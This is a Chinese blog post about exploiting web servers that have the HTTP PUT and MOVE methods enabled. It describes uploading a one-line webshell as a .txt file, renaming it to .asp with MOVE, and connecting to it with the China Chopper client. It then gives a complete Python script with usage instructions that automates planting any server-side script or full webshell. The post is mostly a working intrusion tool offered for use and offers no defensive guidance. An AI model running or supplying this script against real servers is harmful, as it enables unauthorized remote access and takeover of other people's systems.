网络与信息安全信息安全程序猿阵线联盟-汇总各类技术干货

服务器PUT上传工具

2018-04-10  本文已影响114人  年华不散场

0X00 起因

今天偶尔遇到一个网站开启了PUT方法和MOVE等不安全的HTTP方法


不安全的HTTP方法

于是想到利用PUT上传可执行脚本拿shell,可是发现不能上传.asp文件


禁止上传ASP

测试了一下发现可以上传TXT等类型文件


TXT上传

0X01 测试

尝试一下上传一个TXT一句话木马到服务器,成功上传


TXT一句话

使用MOVE方法更改文件名


MOVE更改文件名

菜刀连接一句话木马


菜刀连接

0X02实现

为了方便上传,遂决定用python写一个脚本,实现自动化上传


自动化上传

脚本实现如下:

#! /usr/bin/env python
#coding:utf-8
import requests
import sys

if sys.argv[1] == "-a":
    if len(sys.argv) != 4:
        print("参数格式:-a 服务器地址 上传的文件")
        print("例如: -a http://192.168.1.1 /root/shell.asp")
        sys.exit()

if sys.argv[1] == "-a":

    url = sys.argv[2]

    payload = open(sys.argv[3])

    oldname = "4587e3dd4272c7c8.txt"

    modname = sys.argv[3].split('/')[-1]

    headers = {"Destination":url + '/' + modname}

    r = requests.put(url + '/' + oldname,data=payload)

    if str(r.status_code)[0:1] == '2':

        r = requests.request("MOVE",url + '/' + oldname,headers=headers)

        if str(r.status_code)[0:1] == '2':

            print ("命令成功执行,脚本地址:" + url + '/' + modname)

        else:

            print ("移动失败,服务器可能没开MOVE方法")

    else:

        print ("上传失败,服务器可能没开PUT方法")

如果服务器没有开启PUT方法


未开启PUT方法

0X03 运行

这个脚本一样可以上传类似于大马的服务器端脚本


上传大马 大马执行

其中命令格式为:./ceshi.py -a http://192.168.1.111 /root/nianhua.asp

上一篇下一篇

猜你喜欢

热点阅读